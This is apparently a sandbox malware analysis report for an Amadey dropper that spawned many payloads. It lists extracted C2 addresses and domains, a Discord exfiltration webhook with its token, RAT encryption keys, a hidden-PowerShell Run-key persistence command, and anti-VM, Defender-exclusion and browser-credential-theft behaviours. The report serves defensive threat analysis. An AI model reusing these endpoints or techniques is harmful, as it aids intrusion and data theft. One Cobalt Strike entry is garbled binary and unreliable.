amadey | 85b8d5214c0bc80b888c6a3404c2a371e3aaba32561d069f454b0af159015396

Analysis

max time kernel
136s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28-11-2024 20:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document.exe
Size

4KB
MD5

a239a27c2169af388d4f5be6b52f272c
SHA1

0feb9a0cd8c25f01d071e9b2cfc2ae7bd430318c
SHA256

98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc
SHA512

f30e1ff506cc4d729f7e24aa46e832938a5e21497f1f82f1b300d47f45dae7f1caef032237ef1f5ae9001195c43c0103e3ab787f9196c8397846c1dea8f351da
SSDEEP

48:6r1huik0xzYGJZZJOQOulbfSqXSfbNtm:IIxcLpf6zNt

Malware Config

Extracted

Family

amadey

Version

5.10

Botnet

e43a13

http://154.216.20.237

Attributes

install_dir
9f16311490
install_file
Gxtuum.exe
strings_key
a7aaea3610a351d7a88f318681678260
url_paths
/Gd84kkjf/index.php

rc4.plain

Extracted

Family

lumma

https://preside-comforter.sbs

https://savvy-steereo.sbs

https://copper-replace.sbs

https://record-envyp.sbs

https://slam-whipp.sbs

https://wrench-creter.sbs

https://looky-marked.sbs

https://plastic-mitten.sbs

https://tail-cease.cyou

Extracted

Family

quasar

Version

1.4.1

Botnet

SGVP

192.168.1.9:4782

150.129.206.176:4782

Ai-Sgvp-33452.portmap.host:33452

Mutex

a35ec7b7-5a95-4207-8f25-7af0a7847fa5

Attributes

encryption_key
09BBDA8FF0524296F02F8F81158F33C0AA74D487
install_name
User Application Data.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windowns Client Startup
subdirectory
Quasar

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

14.243.221.170:2654

Mutex

a7b38fdd-192e-4e47-b9ba-ca9eb81cc7bd

Attributes

encryption_key
8B9AD736E943A06EAF1321AD479071E83805704C
install_name
Runtime Broker.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Runtime Broker
subdirectory
SubDir

Extracted

Family

quasar

Version

1.4.1

Botnet

ZJEB

VIPEEK1990-25013.portmap.host:25013

Mutex

ad21b115-2c1b-40cb-adba-a50736b76c21

Attributes

encryption_key
3EBA8BC34FA983893A9B07B831E7CEB183F7492D
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windows Security Service
subdirectory
SubDir

Extracted

Family

asyncrat

Botnet

Default

technical-southwest.gl.at.ply.gg:58694

forums-appliances.gl.at.ply.gg:1962

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

mercurialgrabber

https://discordapp.com/api/webhooks/1308883657456619530/0_Ad9EyrLZrIMKH4vjM6XHyvCJJtKddsiohDSyvCWZ8HIxpyNxmVJgrKb_zO-jqSHSO0

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

3.70.228.168:555

Mutex

bslxturcmlpmyqrv

Attributes

delay
1
install
true
install_file
atat.exe
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

3.70.228.168:555

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

66.66.146.74:9511

Mutex

nwJFeGdDXcL2

Attributes

delay
3
install
true
install_file
System32.exe
install_folder
%AppData%

aes.plain

Extracted

Family

cobaltstrike

http://�'�)��@��@'��u�.Qt�,��R�y��b� ��6��'\�<C+xS��ǎ}��0IޭQ�}�W��x��R8�&w�}�+yq��R.�kem:2470497230)��@��@'��u�.Qt�,��R�y��b� ��6��'\�<C+xS��ǎ}��0IޭQ�}�W��x��R8�&w�}�+yq��R.�kem

Extracted

Family

lumma

https://tail-cease.cyou/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
trojan backdoor cobaltstrike
Cobaltstrike family
cobaltstrike

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/memory/1748-481-0x00000209B3D40000-0x00000209B3D80000-memory.dmp	family_umbral
behavioral2/files/0x0008000000023ca3-476.dat	family_umbral

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Mercurial Grabber Stealer
Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.
stealer mercurialgrabber
Mercurialgrabber family
mercurialgrabber
Njrat family
njrat
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 6 IoCs

resource	yara_rule
behavioral2/memory/4376-412-0x0000000000160000-0x0000000000484000-memory.dmp	family_quasar
behavioral2/files/0x00060000000226ca-407.dat	family_quasar
behavioral2/memory/3608-422-0x0000000000100000-0x0000000000424000-memory.dmp	family_quasar
behavioral2/files/0x000c0000000238a7-417.dat	family_quasar
behavioral2/files/0x000a000000023bbf-433.dat	family_quasar
behavioral2/memory/3316-438-0x0000000000110000-0x0000000000434000-memory.dmp	family_quasar

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

VenomRAT 4 IoCs

Detects VenomRAT.

rat

resource	yara_rule
behavioral2/memory/5276-615-0x0000000000850000-0x0000000000868000-memory.dmp	VenomRAT
behavioral2/files/0x0008000000023cb1-610.dat	VenomRAT
behavioral2/memory/5536-630-0x0000000000120000-0x0000000000138000-memory.dmp	VenomRAT
behavioral2/files/0x0009000000023cb7-625.dat	VenomRAT

Venomrat family
venomrat
Xmrig family
xmrig
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 5 IoCs

rat

resource	yara_rule
behavioral2/files/0x0009000000023c9e-453.dat	family_asyncrat
behavioral2/files/0x0008000000023ca5-496.dat	family_asyncrat
behavioral2/files/0x0008000000023cb1-610.dat	family_asyncrat
behavioral2/files/0x0009000000023cb7-625.dat	family_asyncrat
behavioral2/files/0x0008000000023cc5-661.dat	family_asyncrat

Enumerates VirtualBox registry keys 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF	random.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	nbea1t8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe

Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions	output.exe

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral2/memory/3416-812-0x00007FF6398B0000-0x00007FF63A500000-memory.dmp	xmrig
behavioral2/memory/3416-813-0x00007FF6398B0000-0x00007FF63A500000-memory.dmp	xmrig

Blocklisted process makes network request 4 IoCs

flow	pid	Process
88	1592	powershell.exe
89	1592	powershell.exe
98	1592	powershell.exe
104	1592	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4260	powershell.exe
2452	powershell.exe
4168	powershell.exe
1592	powershell.exe
2740	powershell.exe
1512	powershell.exe
3948	powershell.exe
4260	powershell.exe
2452	powershell.exe

Download via BitsAdmin 1 TTPs 2 IoCs

dropper

BITS Jobs

T1197

pid	Process
4244	bitsadmin.exe
3924	bitsadmin.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	saloader.exe

Looks for VMWare Tools registry key 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools	output.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4956	netsh.exe

Uses browser remote debugging 2 TTPs 9 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
1436	chrome.exe
6204	msedge.exe
2924	msedge.exe
3764	msedge.exe
1020	msedge.exe
6212	msedge.exe
4828	chrome.exe
4524	chrome.exe
4500	chrome.exe

Checks BIOS information in registry 2 TTPs 5 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	nbea1t8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	nbea1t8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	output.exe

Checks computer location settings 2 TTPs 14 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	MSI98D8.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	aidans.dont.run.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	aa.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	start.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	seksiak.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	t6kzDd6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	xs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	dsd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	New Text Document.exe

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemCare1.0.lnk	msiexec.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22.exe	22.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22.exe	22.exe

Executes dropped EXE 46 IoCs

pid	Process
4224	t6kzDd6.exe
1092	Gxtuum.exe
4464	Gxtuum.exe
2332	TcMBq5M.exe
672	uxN4wDZ.exe
3712	tvtC9D3.exe
3048	uxN4wDZ.exe
4212	uxN4wDZ.exe
4436	nbea1t8.exe
4092	random.exe
396	SystemCare1.0.exe
5072	MSI98D8.tmp
1644	22.exe
4376	SGVP%20Client%20Users.exe
3608	Registry.exe
948	Runtime Broker.exe
3316	seksiak.exe
1088	dsd.exe
2332	Loader.exe
440	output.exe
1748	saloader.exe
4416	aidans.dont.run.exe
1948	handeltest.exe
3840	xs.exe
4168	Tutorial.exe
5276	aa.exe
5536	nobody.exe
5612	svchost.exe
5728	ataturk.exe
5960	start.exe
6008	windows.exe
5172	aspnet_regbrowsers.exe
2116	seksiak.exe
5224	atat.exe
5772	System32.exe
6004	seksiak.exe
5820	Gxtuum.exe
1824	seksiak.exe
5596	seksiak.exe
6052	seksiak.exe
3700	TPB-1.exe
3416	xblkpfZ8Y4.exe
736	test28.exe
2188	test26.exe
5984	test27.exe
5424	test29.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	nbea1t8.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	random.exe

Loads dropped DLL 26 IoCs

pid	Process
3288	MsiExec.exe
3288	MsiExec.exe
3712	tvtC9D3.exe
3712	tvtC9D3.exe
2116	MsiExec.exe
2116	MsiExec.exe
2116	MsiExec.exe
2116	MsiExec.exe
2116	MsiExec.exe
2116	MsiExec.exe
2116	MsiExec.exe
396	SystemCare1.0.exe
396	SystemCare1.0.exe
396	SystemCare1.0.exe
396	SystemCare1.0.exe
396	SystemCare1.0.exe
396	SystemCare1.0.exe
396	SystemCare1.0.exe
396	SystemCare1.0.exe
396	SystemCare1.0.exe
396	SystemCare1.0.exe
396	SystemCare1.0.exe
396	SystemCare1.0.exe
396	SystemCare1.0.exe
396	SystemCare1.0.exe
3712	tvtC9D3.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\nbea1t8.exe'\""	nbea1t8.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	TcMBq5M.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	TcMBq5M.exe
File opened (read-only)	\??\P:	TcMBq5M.exe
File opened (read-only)	\??\Z:	TcMBq5M.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\I:	TcMBq5M.exe
File opened (read-only)	\??\O:	TcMBq5M.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\L:	TcMBq5M.exe
File opened (read-only)	\??\Q:	TcMBq5M.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\G:	TcMBq5M.exe
File opened (read-only)	\??\N:	TcMBq5M.exe
File opened (read-only)	\??\U:	TcMBq5M.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\A:	TcMBq5M.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\H:	TcMBq5M.exe
File opened (read-only)	\??\M:	TcMBq5M.exe
File opened (read-only)	\??\W:	TcMBq5M.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\J:	TcMBq5M.exe
File opened (read-only)	\??\V:	TcMBq5M.exe
File opened (read-only)	\??\Y:	TcMBq5M.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\T:	TcMBq5M.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\B:	TcMBq5M.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
240	bitbucket.org
239	bitbucket.org

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	output.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	output.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4436	nbea1t8.exe
4092	random.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 672 set thread context of 4212	672	uxN4wDZ.exe	159
PID 4168 set thread context of 5656	4168	Tutorial.exe	254

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000c000000000745-745.dat	upx
behavioral2/memory/3416-747-0x00007FF6398B0000-0x00007FF63A500000-memory.dmp	upx
behavioral2/memory/3416-812-0x00007FF6398B0000-0x00007FF63A500000-memory.dmp	upx
behavioral2/memory/3416-813-0x00007FF6398B0000-0x00007FF63A500000-memory.dmp	upx
behavioral2/memory/3416-863-0x00007FF6398B0000-0x00007FF63A500000-memory.dmp	upx

Drops file in Windows directory 17 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\Gxtuum.job	t6kzDd6.exe
File opened for modification	C:\Windows\Installer\e587be2.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7CB0.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7D00.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI805C.tmp	msiexec.exe
File created	C:\Windows\Installer\e587be2.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7C6F.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06}	msiexec.exe
File created	C:\Windows\Installer\e587be6.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7C80.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7CC1.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7C4F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI81F4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI98D8.tmp	msiexec.exe

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
5072	MSI98D8.tmp

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 21 IoCs

pid	pid_target	Process	procid_target
916	4224	WerFault.exe	94
3144	4224	WerFault.exe	94
540	4224	WerFault.exe	94
2912	4224	WerFault.exe	94
1064	4224	WerFault.exe	94
3628	4224	WerFault.exe	94
5088	4224	WerFault.exe	94
4704	4224	WerFault.exe	94
1436	4224	WerFault.exe	94
4788	4224	WerFault.exe	94
704	1092	WerFault.exe	118
3636	1092	WerFault.exe	118
4372	1092	WerFault.exe	118
1324	1092	WerFault.exe	118
5112	1092	WerFault.exe	118
5040	1092	WerFault.exe	118
3824	1092	WerFault.exe	118
1080	1092	WerFault.exe	118
540	4464	WerFault.exe	140
5272	5820	WerFault.exe	301
1420	1092	WerFault.exe	118

System Location Discovery: System Language Discovery 1 TTPs 34 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	System32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SystemCare1.0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	handeltest.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSI98D8.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regbrowsers.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Tutorial.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TPB-1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ping.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tvtC9D3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	t6kzDd6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	uxN4wDZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nbea1t8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	uxN4wDZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dsd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	start.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TcMBq5M.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 10 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
6112	PING.EXE
6060	cmd.exe
5076	PING.EXE
5456	PING.EXE
5580	PING.EXE
4756	PING.EXE
1264	ping.exe
3644	PING.EXE
5252	PING.EXE
2564	PING.EXE

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000f914d34881601a250000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000f914d3480000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900f914d348000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1df914d348000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000f914d34800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S	output.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	output.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	output.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	TPB-1.exe
